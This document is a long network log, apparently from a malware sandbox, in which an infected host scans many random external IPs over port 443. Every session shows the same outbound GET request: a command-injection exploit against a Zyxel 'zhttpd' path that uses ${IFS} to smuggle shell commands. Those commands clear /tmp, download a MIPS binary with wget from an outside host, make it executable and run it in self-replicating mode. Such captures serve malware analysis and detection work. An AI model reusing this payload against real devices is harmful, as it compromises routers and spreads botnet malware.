                                            Jan 14, 2024 15:50:56.775245905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8940192.168.2.2339374135.160.211.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775300026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8941192.168.2.234429670.133.154.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775337934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8942192.168.2.234647817.113.220.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775382996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8943192.168.2.235108670.14.109.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775435925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8944192.168.2.2340492153.82.155.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775479078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8945192.168.2.235056879.186.197.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775511026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8946192.168.2.2348586220.141.127.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775572062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8947192.168.2.233839268.71.23.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775599003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8948192.168.2.2357894111.212.165.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775660992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8949192.168.2.235967466.142.92.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775716066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8950192.168.2.235338893.124.36.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775724888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8951192.168.2.2350000103.84.117.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775757074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8952192.168.2.2352104146.42.84.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775805950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8953192.168.2.2357642165.198.233.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775827885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8954192.168.2.2352320153.175.34.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775872946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8955192.168.2.2356034136.120.141.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775895119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8956192.168.2.2339120125.254.222.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775955915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8957192.168.2.2347408185.234.192.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776006937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8958192.168.2.235774874.47.125.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776045084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8959192.168.2.2351208133.31.207.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776077986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8960192.168.2.235646013.245.204.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776103020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8961192.168.2.2339300158.136.25.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776115894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8962192.168.2.234650219.31.125.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776144981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8963192.168.2.2358958160.216.250.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776218891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8964192.168.2.2335640158.174.115.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776245117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8965192.168.2.234368892.7.241.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776287079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8966192.168.2.235481888.29.207.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776320934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8967192.168.2.2345772168.178.113.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776355982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8968192.168.2.2333320210.29.66.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776406050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8969192.168.2.235534260.219.67.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776444912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8970192.168.2.2351018111.155.43.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776484966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8971192.168.2.235207823.194.107.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776509047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8972192.168.2.2359054138.26.220.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776561975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8973192.168.2.2359926117.235.0.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776614904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8974192.168.2.236048412.233.203.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776650906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8975192.168.2.235218888.248.128.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776681900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8976192.168.2.2357234102.180.66.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776719093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8977192.168.2.2339504183.135.112.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776787043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8978192.168.2.235691091.10.20.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776818991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8979192.168.2.23352621.193.87.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776874065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8980192.168.2.2349642115.85.176.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776901960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8981192.168.2.236091249.241.79.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.776949883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8982192.168.2.233912864.148.139.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777003050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8983192.168.2.2346640102.60.49.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777050972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8984192.168.2.2333286198.33.89.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777065992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8985192.168.2.2333770153.67.119.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777137041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8986192.168.2.2356464211.171.182.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777187109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8987192.168.2.2338248125.87.204.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777215958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8988192.168.2.23444802.192.0.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777240038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8989192.168.2.2354864193.139.27.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777276993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8990192.168.2.235198498.52.241.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777318001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8991192.168.2.234412683.195.202.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777357101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8992192.168.2.233606894.147.197.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777419090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8993192.168.2.2337248106.130.121.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777472019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8994192.168.2.236085446.51.91.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777523041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8995192.168.2.235199859.14.160.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777561903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8996192.168.2.236087049.53.98.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777592897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8997192.168.2.234067612.107.78.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777647018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8998192.168.2.234725462.75.155.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777668953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8999192.168.2.2348188138.52.12.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777715921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9000192.168.2.23555962.131.69.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777779102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9001192.168.2.234694089.235.154.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.777821064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9002192.168.2.233591620.7.35.99443
                                            TimestampBytes transferredDirectionData
